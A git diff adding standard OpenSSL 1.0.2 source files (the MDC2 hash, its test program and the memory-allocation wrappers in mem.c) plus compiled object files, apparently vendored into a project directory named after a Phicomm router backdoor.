+        d[1] = dd[1] = tin1;
+        c->h[0] = (c->h[0] & 0x9f) | 0x40;
+        c->hh[0] = (c->hh[0] & 0x9f) | 0x20;
+
+        DES_set_odd_parity(&c->h);
+        DES_set_key_unchecked(&c->h, &k);
+        DES_encrypt1(d, &k, 1);
+
+        DES_set_odd_parity(&c->hh);
+        DES_set_key_unchecked(&c->hh, &k);
+        DES_encrypt1(dd, &k, 1);
+
+        ttin0 = tin0 ^ dd[0];
+        ttin1 = tin1 ^ dd[1];
+        tin0 ^= d[0];
+        tin1 ^= d[1];
+
+        p = c->h;
+        l2c(tin0, p);
+        l2c(ttin1, p);
+        p = c->hh;
+        l2c(ttin0, p);
+        l2c(tin1, p);
+    }
+}
+
+int MDC2_Final(unsigned char *md, MDC2_CTX *c)
+{
+    unsigned int i;
+    int j;
+
+    i = c->num;
+    j = c->pad_type;
+    if ((i > 0) || (j == 2)) {
+        if (j == 2)
+            c->data[i++] = 0x80;
+        memset(&(c->data[i]), 0, MDC2_BLOCK - i);
+        mdc2_body(c, c->data, MDC2_BLOCK);
+    }
+    memcpy(md, (char *)c->h, MDC2_BLOCK);
+    memcpy(&(md[MDC2_BLOCK]), (char *)c->hh, MDC2_BLOCK);
+    return 1;
+}
+
+#undef TEST
+
+#ifdef TEST
+main()
+{
+    unsigned char md[MDC2_DIGEST_LENGTH];
+    int i;
+    MDC2_CTX c;
+    static char *text = "Now is the time for all ";
+
+    MDC2_Init(&c);
+    MDC2_Update(&c, text, strlen(text));
+    MDC2_Final(&(md[0]), &c);
+
+    for (i = 0; i < MDC2_DIGEST_LENGTH; i++)
+        printf("%02X", md[i]);
+    printf("\n");
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/mdc2dgst.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/mdc2dgst.o
new file mode 100644
index 0000000000000000000000000000000000000000..30222bc35894a6d4e0826182e6915c243b62d00e
GIT binary patch
literal 2768
zcmbtVUuauZ7(YpFmrk?0sC5KZBoB9zvMnTS#cl)bO>WYYadm8MCg`?nn%u3WX<CvS
zwrbUmxU#eC>IC0?P((yQ!H2pBiB4=E2R?Lr5ceXhs|cfrb8g1(oO@1t7gG@Z;N0&!
zzw`Y&zc2UZjg+4DdOS#o2R(x}b^=A{l7GV<Wac2+h5|@^0h8OQcvC&9+ouC+RvpO>
zWAZ0H`^yq|VKSn07I0nK6=AzKl?Bl8hJIjH>D*pxz~(|SkghBHbi1ew=;ZfAy|_=p
zL{~zY+G1zz#(NqmD6!hoAk~rc$-sqV7bz<JZ~|&iZ7F;{*|h?BkWPMucxGOvH-J61
zXO##;u>EQmCbLS=+10^<^9^U}852ldQ)2ZIr61R!4K02neoO0v;(bt0Bl!Rs4iac$
zBJ}f9&1MtVol6yPpL0vA!>Muh+a>7YrQ_-`^|*RMHLk2}f8s7)IKpL-5sJxB059y~
z0=upS+WX>AH&rZza+)FcvY7k^%zl5k?#JgEmX7T}2-_om3D^GcpO!IM#^n0i2dbxA
zS<QXf3DE#uX1eEVY#$5Vfx|^ffdioCCS=RlmLjbj_^a8>kRLL&pYB+)PHtgJ<INQX
zV7+J6+L5s}MLK9(dm-O-Oco&v=~iB3Z911@T|#^Jp}n=k^)2<I-RBxrf9<Zf+P~UC
z)mHLNv+<qwm^23+`y{73yCOkjWI5hoU9NqM$&V|a-lvQv1DK=`XqZ{5Q`EYGhLXws
z;YfD0TC%F)ebK&XY;XMOD%-|i?~O%c{XGthkObEZ!s>uE^n4b15o%D(2a8IVqmbv7
zBgk_m=-C<YcU}U{G2q?&Y&V@jLJq#|#d7E^Us?{^QbLYg>`>*{{1#OnsQC}db6%g<
zBM$(i%8`T|PRJn$NyxxFtv|+d^>N(~dY0QCQk|BAwikjf`ZPH_FKKe5)}hHU@4Os=
zf~v?y=k^7UV>wfDaNeuQp&E_z4$C1(q|&PGg<eHMx0~%weQn=(%9UX2!6+YN_dzTG
zTdyk*<Bq%d(3S_C*KyZJ#pU5c?XTfu({wq4xdRsExmET6&<=lg6Fj>KKDr5B0sK+8
zuehg}?`s@CK?w(8GX_myQGW@3h*ZSy0!<e3y@gX1E1GAfF*;S4LB^1ND52`cp>%pU
zHDZjY2|Z;XEj4UZOv{)m6pZOydEA;=hbGJ!qgu+3nfVE`z)-W4FV9R{aby@3E0>=z
z@?#Um$=rAmJ*OpmjZA6Wa;)rhA!nJ6ogOdcimbnR_H^E(hrzxFpE@e<xNtgifxqv<
zx4H1oUAQ~XS1#P0=c)^L=Xsp-N#9`^mZ%%%{*+cuEkm4JI2gsnoaWf+1}^4A|CgwU
zJYr5LTA7)&a-*QFvZKd@RW^&csAZn9P!uT4q3CF(f};7U$w{*WSZT^Kqwww7%lPN}
zQ>AKjx;!;)mSK8Pmcbk|PL^|%rqjUxe1;*OQq}s#4FX1`=q3sFoK|*5A3I@Djt616
zCBzec#KDI^(^&DQhB*Et$6LP~pS0BF?*FL2hv)pS@o`>1CJJyZ>hEsB#r=ie&*NL%
z(DJ|R{~!d?uUf17H4cPZ5)1wWJPHQwr8WKz2d)W6u3O`e1Kw_a4L-k@c^sV|jTP}?
ze(h@0kgI$kpK+q-yDW0ha}mE4?AF=Q^EvuQ4Dzm{)}MlR0XzamyZA8ws}S$C@NbR(
E8?3Xl*8l(j

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/mdc2test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/mdc2test.c
new file mode 100644
index 0000000..8416252
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mdc2/mdc2test.c
@@ -0,0 +1,146 @@
+/* crypto/mdc2/mdc2test.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#include "../e_os.h"
+
+#if defined(OPENSSL_NO_DES) && !defined(OPENSSL_NO_MDC2)
+# define OPENSSL_NO_MDC2
+#endif
+
+#ifdef OPENSSL_NO_MDC2
+int main(int argc, char *argv[])
+{
+    printf("No MDC2 support\n");
+    return (0);
+}
+#else
+# include <openssl/evp.h>
+# include <openssl/mdc2.h>
+
+# ifdef CHARSET_EBCDIC
+#  include <openssl/ebcdic.h>
+# endif
+
+static unsigned char pad1[16] = {
+    0x42, 0xE5, 0x0C, 0xD2, 0x24, 0xBA, 0xCE, 0xBA,
+    0x76, 0x0B, 0xDD, 0x2B, 0xD4, 0x09, 0x28, 0x1A
+};
+
+static unsigned char pad2[16] = {
+    0x2E, 0x46, 0x79, 0xB5, 0xAD, 0xD9, 0xCA, 0x75,
+    0x35, 0xD8, 0x7A, 0xFE, 0xAB, 0x33, 0xBE, 0xE2
+};
+
+int main(int argc, char *argv[])
+{
+    int ret = 0;
+    unsigned char md[MDC2_DIGEST_LENGTH];
+    int i;
+    EVP_MD_CTX c;
+    static char *text = "Now is the time for all ";
+
+# ifdef CHARSET_EBCDIC
+    ebcdic2ascii(text, text, strlen(text));
+# endif
+
+    EVP_MD_CTX_init(&c);
+    EVP_DigestInit_ex(&c, EVP_mdc2(), NULL);
+    EVP_DigestUpdate(&c, (unsigned char *)text, strlen(text));
+    EVP_DigestFinal_ex(&c, &(md[0]), NULL);
+
+    if (memcmp(md, pad1, MDC2_DIGEST_LENGTH) != 0) {
+        for (i = 0; i < MDC2_DIGEST_LENGTH; i++)
+            printf("%02X", md[i]);
+        printf(" <- generated\n");
+        for (i = 0; i < MDC2_DIGEST_LENGTH; i++)
+            printf("%02X", pad1[i]);
+        printf(" <- correct\n");
+        ret = 1;
+    } else
+        printf("pad1 - ok\n");
+
+    EVP_DigestInit_ex(&c, EVP_mdc2(), NULL);
+    /* FIXME: use a ctl function? */
+    ((MDC2_CTX *)c.md_data)->pad_type = 2;
+    EVP_DigestUpdate(&c, (unsigned char *)text, strlen(text));
+    EVP_DigestFinal_ex(&c, &(md[0]), NULL);
+
+    if (memcmp(md, pad2, MDC2_DIGEST_LENGTH) != 0) {
+        for (i = 0; i < MDC2_DIGEST_LENGTH; i++)
+            printf("%02X", md[i]);
+        printf(" <- generated\n");
+        for (i = 0; i < MDC2_DIGEST_LENGTH; i++)
+            printf("%02X", pad2[i]);
+        printf(" <- correct\n");
+        ret = 1;
+    } else
+        printf("pad2 - ok\n");
+
+    EVP_MD_CTX_cleanup(&c);
+# ifdef OPENSSL_SYS_NETWARE
+    if (ret)
+        printf("ERROR: %d\n", ret);
+# endif
+    EXIT(ret);
+    return (ret);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mem.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mem.c
new file mode 100644
index 0000000..2ce3e89
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mem.c
@@ -0,0 +1,463 @@
+/* crypto/mem.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <openssl/crypto.h>
+#include "cryptlib.h"
+
+static int allow_customize = 1; /* we provide flexible functions for */
+static int allow_customize_debug = 1; /* exchanging memory-related functions
+                                       * at run-time, but this must be done
+                                       * before any blocks are actually
+                                       * allocated; or we'll run into huge
+                                       * problems when malloc/free pairs
+                                       * don't match etc. */
+
+/*
+ * the following pointers may be changed as long as 'allow_customize' is set
+ */
+
+static void *(*malloc_func) (size_t) = malloc;
+static void *default_malloc_ex(size_t num, const char *file, int line)
+{
+    return malloc_func(num);
+}
+
+static void *(*malloc_ex_func) (size_t, const char *file, int line)
+    = default_malloc_ex;
+
+static void *(*realloc_func) (void *, size_t) = realloc;
+static void *default_realloc_ex(void *str, size_t num,
+                                const char *file, int line)
+{
+    return realloc_func(str, num);
+}
+
+static void *(*realloc_ex_func) (void *, size_t, const char *file, int line)
+    = default_realloc_ex;
+
+static void (*free_func) (void *) = free;
+
+static void *(*malloc_locked_func) (size_t) = malloc;
+static void *default_malloc_locked_ex(size_t num, const char *file, int line)
+{
+    return malloc_locked_func(num);
+}
+
+static void *(*malloc_locked_ex_func) (size_t, const char *file, int line)
+    = default_malloc_locked_ex;
+
+static void (*free_locked_func) (void *) = free;
+
+/* may be changed as long as 'allow_customize_debug' is set */
+/* XXX use correct function pointer types */
+#ifdef CRYPTO_MDEBUG
+/* use default functions from mem_dbg.c */
+static void (*malloc_debug_func) (void *, int, const char *, int, int)
+    = CRYPTO_dbg_malloc;
+static void (*realloc_debug_func) (void *, void *, int, const char *, int,
+                                   int)
+    = CRYPTO_dbg_realloc;
+static void (*free_debug_func) (void *, int) = CRYPTO_dbg_free;
+static void (*set_debug_options_func) (long) = CRYPTO_dbg_set_options;
+static long (*get_debug_options_func) (void) = CRYPTO_dbg_get_options;
+#else
+/*
+ * applications can use CRYPTO_malloc_debug_init() to select above case at
+ * run-time
+ */
+static void (*malloc_debug_func) (void *, int, const char *, int, int) = NULL;
+static void (*realloc_debug_func) (void *, void *, int, const char *, int,
+                                   int)
+    = NULL;
+static void (*free_debug_func) (void *, int) = NULL;
+static void (*set_debug_options_func) (long) = NULL;
+static long (*get_debug_options_func) (void) = NULL;
+#endif
+
+int CRYPTO_set_mem_functions(void *(*m) (size_t), void *(*r) (void *, size_t),
+                             void (*f) (void *))
+{
+    /* Dummy call just to ensure OPENSSL_init() gets linked in */
+    OPENSSL_init();
+    if (!allow_customize)
+        return 0;
+    if ((m == 0) || (r == 0) || (f == 0))
+        return 0;
+    malloc_func = m;
+    malloc_ex_func = default_malloc_ex;
+    realloc_func = r;
+    realloc_ex_func = default_realloc_ex;
+    free_func = f;
+    malloc_locked_func = m;
+    malloc_locked_ex_func = default_malloc_locked_ex;
+    free_locked_func = f;
+    return 1;
+}
+
+int CRYPTO_set_mem_ex_functions(void *(*m) (size_t, const char *, int),
+                                void *(*r) (void *, size_t, const char *,
+                                            int), void (*f) (void *))
+{
+    if (!allow_customize)
+        return 0;
+    if ((m == 0) || (r == 0) || (f == 0))
+        return 0;
+    malloc_func = 0;
+    malloc_ex_func = m;
+    realloc_func = 0;
+    realloc_ex_func = r;
+    free_func = f;
+    malloc_locked_func = 0;
+    malloc_locked_ex_func = m;
+    free_locked_func = f;
+    return 1;
+}
+
+int CRYPTO_set_locked_mem_functions(void *(*m) (size_t), void (*f) (void *))
+{
+    if (!allow_customize)
+        return 0;
+    if ((m == NULL) || (f == NULL))
+        return 0;
+    malloc_locked_func = m;
+    malloc_locked_ex_func = default_malloc_locked_ex;
+    free_locked_func = f;
+    return 1;
+}
+
+int CRYPTO_set_locked_mem_ex_functions(void *(*m) (size_t, const char *, int),
+                                       void (*f) (void *))
+{
+    if (!allow_customize)
+        return 0;
+    if ((m == NULL) || (f == NULL))
+        return 0;
+    malloc_locked_func = 0;
+    malloc_locked_ex_func = m;
+    free_func = f;
+    return 1;
+}
+
+int CRYPTO_set_mem_debug_functions(void (*m)
+                                    (void *, int, const char *, int, int),
+                                   void (*r) (void *, void *, int,
+                                              const char *, int, int),
+                                   void (*f) (void *, int), void (*so) (long),
+                                   long (*go) (void))
+{
+    if (!allow_customize_debug)
+        return 0;
+    OPENSSL_init();
+    malloc_debug_func = m;
+    realloc_debug_func = r;
+    free_debug_func = f;
+    set_debug_options_func = so;
+    get_debug_options_func = go;
+    return 1;
+}
+
+void CRYPTO_get_mem_functions(void *(**m) (size_t),
+                              void *(**r) (void *, size_t),
+                              void (**f) (void *))
+{
+    if (m != NULL)
+        *m = (malloc_ex_func == default_malloc_ex) ? malloc_func : 0;
+    if (r != NULL)
+        *r = (realloc_ex_func == default_realloc_ex) ? realloc_func : 0;
+    if (f != NULL)
+        *f = free_func;
+}
+
+void CRYPTO_get_mem_ex_functions(void *(**m) (size_t, const char *, int),
+                                 void *(**r) (void *, size_t, const char *,
+                                              int), void (**f) (void *))
+{
+    if (m != NULL)
+        *m = (malloc_ex_func != default_malloc_ex) ? malloc_ex_func : 0;
+    if (r != NULL)
+        *r = (realloc_ex_func != default_realloc_ex) ? realloc_ex_func : 0;
+    if (f != NULL)
+        *f = free_func;
+}
+
+void CRYPTO_get_locked_mem_functions(void *(**m) (size_t),
+                                     void (**f) (void *))
+{
+    if (m != NULL)
+        *m = (malloc_locked_ex_func == default_malloc_locked_ex) ?
+            malloc_locked_func : 0;
+    if (f != NULL)
+        *f = free_locked_func;
+}
+
+void CRYPTO_get_locked_mem_ex_functions(void
+                                        *(**m) (size_t, const char *, int),
+                                        void (**f) (void *))
+{
+    if (m != NULL)
+        *m = (malloc_locked_ex_func != default_malloc_locked_ex) ?
+            malloc_locked_ex_func : 0;
+    if (f != NULL)
+        *f = free_locked_func;
+}
+
+void CRYPTO_get_mem_debug_functions(void (**m)
+                                     (void *, int, const char *, int, int),
+                                    void (**r) (void *, void *, int,
+                                                const char *, int, int),
+                                    void (**f) (void *, int),
+                                    void (**so) (long), long (**go) (void))
+{
+    if (m != NULL)
+        *m = malloc_debug_func;
+    if (r != NULL)
+        *r = realloc_debug_func;
+    if (f != NULL)
+        *f = free_debug_func;
+    if (so != NULL)
+        *so = set_debug_options_func;
+    if (go != NULL)
+        *go = get_debug_options_func;
+}
+
+void *CRYPTO_malloc_locked(int num, const char *file, int line)
+{
+    void *ret = NULL;
+
+    if (num <= 0)
+        return NULL;
+
+    if (allow_customize)
+        allow_customize = 0;
+    if (malloc_debug_func != NULL) {
+        if (allow_customize_debug)
+            allow_customize_debug = 0;
+        malloc_debug_func(NULL, num, file, line, 0);
+    }
+    ret = malloc_locked_ex_func(num, file, line);
+#ifdef LEVITTE_DEBUG_MEM
+    fprintf(stderr, "LEVITTE_DEBUG_MEM:         > 0x%p (%d)\n", ret, num);
+#endif
+    if (malloc_debug_func != NULL)
+        malloc_debug_func(ret, num, file, line, 1);
+
+#ifndef OPENSSL_CPUID_OBJ
+    /*
+     * Create a dependency on the value of 'cleanse_ctr' so our memory
+     * sanitisation function can't be optimised out. NB: We only do this for
+     * >2Kb so the overhead doesn't bother us.
+     */
+    if (ret && (num > 2048)) {
+        extern unsigned char cleanse_ctr;
+        ((unsigned char *)ret)[0] = cleanse_ctr;
+    }
+#endif
+
+    return ret;
+}
+
+void CRYPTO_free_locked(void *str)
+{
+    if (free_debug_func != NULL)
+        free_debug_func(str, 0);
+#ifdef LEVITTE_DEBUG_MEM
+    fprintf(stderr, "LEVITTE_DEBUG_MEM:         < 0x%p\n", str);
+#endif
+    free_locked_func(str);
+    if (free_debug_func != NULL)
+        free_debug_func(NULL, 1);
+}
+
+void *CRYPTO_malloc(int num, const char *file, int line)
+{
+    void *ret = NULL;
+
+    if (num <= 0)
+        return NULL;
+
+    if (allow_customize)
+        allow_customize = 0;
+    if (malloc_debug_func != NULL) {
+        if (allow_customize_debug)
+            allow_customize_debug = 0;
+        malloc_debug_func(NULL, num, file, line, 0);
+    }
+    ret = malloc_ex_func(num, file, line);
+#ifdef LEVITTE_DEBUG_MEM
+    fprintf(stderr, "LEVITTE_DEBUG_MEM:         > 0x%p (%d)\n", ret, num);
+#endif
+    if (malloc_debug_func != NULL)
+        malloc_debug_func(ret, num, file, line, 1);
+
+#ifndef OPENSSL_CPUID_OBJ
+    /*
+     * Create a dependency on the value of 'cleanse_ctr' so our memory
+     * sanitisation function can't be optimised out. NB: We only do this for
+     * >2Kb so the overhead doesn't bother us.
+     */
+    if (ret && (num > 2048)) {
+        extern unsigned char cleanse_ctr;
+        ((unsigned char *)ret)[0] = cleanse_ctr;
+    }
+#endif
+
+    return ret;
+}
+
+char *CRYPTO_strdup(const char *str, const char *file, int line)
+{
+    char *ret = CRYPTO_malloc(strlen(str) + 1, file, line);
+
+    strcpy(ret, str);
+    return ret;
+}
+
+void *CRYPTO_realloc(void *str, int num, const char *file, int line)
+{
+    void *ret = NULL;
+
+    if (str == NULL)
+        return CRYPTO_malloc(num, file, line);
+
+    if (num <= 0)
+        return NULL;
+
+    if (realloc_debug_func != NULL)
+        realloc_debug_func(str, NULL, num, file, line, 0);
+    ret = realloc_ex_func(str, num, file, line);
+#ifdef LEVITTE_DEBUG_MEM
+    fprintf(stderr, "LEVITTE_DEBUG_MEM:         | 0x%p -> 0x%p (%d)\n", str,
+            ret, num);
+#endif
+    if (realloc_debug_func != NULL)
+        realloc_debug_func(str, ret, num, file, line, 1);
+
+    return ret;
+}
+
+void *CRYPTO_realloc_clean(void *str, int old_len, int num, const char *file,
+                           int line)
+{
+    void *ret = NULL;
+
+    if (str == NULL)
+        return CRYPTO_malloc(num, file, line);
+
+    if (num <= 0)
+        return NULL;
+
+    /*
+     * We don't support shrinking the buffer. Note the memcpy that copies
+     * |old_len| bytes to the new buffer, below.
+     */
+    if (num < old_len)
+        return NULL;
+
+    if (realloc_debug_func != NULL)
+        realloc_debug_func(str, NULL, num, file, line, 0);
+    ret = malloc_ex_func(num, file, line);
+    if (ret) {
+        memcpy(ret, str, old_len);
+        OPENSSL_cleanse(str, old_len);
+        free_func(str);
+    }
+#ifdef LEVITTE_DEBUG_MEM
+    fprintf(stderr,
+            "LEVITTE_DEBUG_MEM:         | 0x%p -> 0x%p (%d)\n",
+            str, ret, num);
+#endif
+    if (realloc_debug_func != NULL)
+        realloc_debug_func(str, ret, num, file, line, 1);
+
+    return ret;
+}
+
+void CRYPTO_free(void *str)
+{
+    if (free_debug_func != NULL)
+        free_debug_func(str, 0);
+#ifdef LEVITTE_DEBUG_MEM
+    fprintf(stderr, "LEVITTE_DEBUG_MEM:         < 0x%p\n", str);
+#endif
+    free_func(str);
+    if (free_debug_func != NULL)
+        free_debug_func(NULL, 1);
+}
+
+void *CRYPTO_remalloc(void *a, int num, const char *file, int line)
+{
+    if (a != NULL)
+        OPENSSL_free(a);
+    a = (char *)OPENSSL_malloc(num);
+    return (a);
+}
+
+void CRYPTO_set_mem_debug_options(long bits)
+{
+    if (set_debug_options_func != NULL)
+        set_debug_options_func(bits);
+}
+
+long CRYPTO_get_mem_debug_options(void)
+{
+    if (get_debug_options_func != NULL)
+        return get_debug_options_func();
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mem.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/mem.o
new file mode 100644
index 0000000000000000000000000000000000000000..45a09d5ee4caba04622734b2e2f813d011ba9f87
GIT binary patch
literal 9400
zcmdU!Yiv}<6@ahT#&!%`I|QgH1RM&<wuF@zXaiA_`kGz)nl9LhZCV0mG4}Eh_z`=z
z0hH2E#}-pCp(?0Rh*Vnjr7DV$+D0vns^y_NqzxqrNh&3(5T&6&8p1Oq#B9%*d(Q6h
zutrtWKOM<CGvA!ooO$fM>u-l6Rlb}Yi%X96kd^5%wXC^inRbP4R#;=K+pSB*lRrsK
zM=)H=X{b?`8(lS6@2WTciIUq!;Ad|#zRvCaSMjcc3wuu$?@AUPOe}GG--$Q4{Ud&s
zN~K&i6UAJmr2+2Ikb6JK^nQy0N0g4jRd;$?q^x`Ae8J?>CTH0pj4|!K+3igg?>gZ2
zUPbQ*618sc>+uEdfcAh!v|U#{s10VYtG?{H7<bcvC#v+op<r^TzX14)-vjRAQ(-o5
z-@qx7f_6#nwDFsiXQ1*lRGu<igkD%TX)bgY*Qgs#V~x6kOK}{Q;???yI;58(;we!E
zb<Wa>lo`bAIZe*;LwZUW%cNk^?H@fj2(y?s8WWKyaJ|&JssQ8k1m4RkkdLV@O3VAw
zR!f=nkN&aNd^rJYM;684({gZFYdVB+ZCX~Zi5X)ig#0WajGL`BkBJbnDP)+QccyE`
z<@O#Clg?QPCxC@(l%)f37CVhjLpXS<{$bdhJH7{b?a_P0QrB?-)m!l*u@fobU}!3d
z$>DG?8B!M_>a6-(FqJyywp<UXixKrfO6Q_R9p+?%{vD3q11uj=r&Gt^T*k+2xo#C&
z*5;z`>OJag&71aUM4ebl+W`-h+w*>UWx$f{swbuu2Css{ZP4(X2~VT{fX6kMa(fP!
zrcU7J|Lx2hVQcmrfnz*)@dfplkKWct%2gk@YCt!eyqSF+R#hFv6Zodn;NWH0n@Wst
zf|UrV)9Mv3l}_}`6}S?@!Bp?n&5Jo-YS4w07CY+YaPWw$UQ-t_u{AB1y@hhsd0xx`
zRss3XIlsdkht-D>bta@vM$`?IJO(bWu{R1WtOoFYfan~IuCd;E7^9ous-q!weo06j
z<f9J(Hb8*t(!7gLZ0LP`bDSM|F&038UTlLQ^+`ls<-iW(45mg}{sdWp+(guoOFw~V
zBI+omi>AQlKzb6#e=VXegw)xHdQZoHE*DOQ-hOl)IZ-{0|IH3;R9Em~8==Ee=l3Te
zhi<>Vj+@RbfvZ4o_RNv<rA~O>hakB1G57d~r7hMLXz`k#?X!CR{QJxNjVlxF@kH6Y
z!0bTz%;0?q-3@M@RURmx^F<GPZt|cifj>O8)r%S}pJgSH<-#A9v0i26Y<k4X*-(-*
zaa2L!P6!%xCec_C)yT@Tu#mz0(EkRpomf}dCEI-=yR<JiWS8~i`8M07j$Kk|7kYl4
zBH2!=(a$r~_AWh7?s;POQ~dzcNop^{y3Q`y;S1ZP{kdVgY<phF_V<kl+2uX?kJ*05
zE~~UlE45qa&>#Q&>QOyMUZBNf2YrvFMO!48pP1eTz)|i2VnHESN34$69H?7~{TdnM
zVuueR>CdgC7<)!IcDe6a+YiY}hlsg<j`XTf&$Y`QFR}|OM}{zM7TSI3zpz^hdY4J>
zZfIL!yQI&zLfdqqTLK#d%O3oISf9pNcVIsI^TM`&JLa=5zpBXgFA&j&NBWlAeh^B>
zkL$6FYz?Gs!P-b$Fz>#6$DZ3$P-$00itM>y+_C+Tn6w?R{GDtZ^Yaqf&z2vY=esmM
z9sTQhF4gnIwYx@Rci<QlJO`ubQ0T8kO^5%$6y{kMQrRSOc~cpKx#?3kbRZWjnWX@L
zPuSrzI01N$m2Z`i0`3JYI7gIcIj-jdM|sQ#7M2e~8|87{SXh2Jv{9brxPDCYOr#v~
z7R?L2vjlCH-$|VNT<;|gl`hO*gdY0EwZXzX32o$Dn7^hu-(t8HUOBCK-c9-Wn7EmT
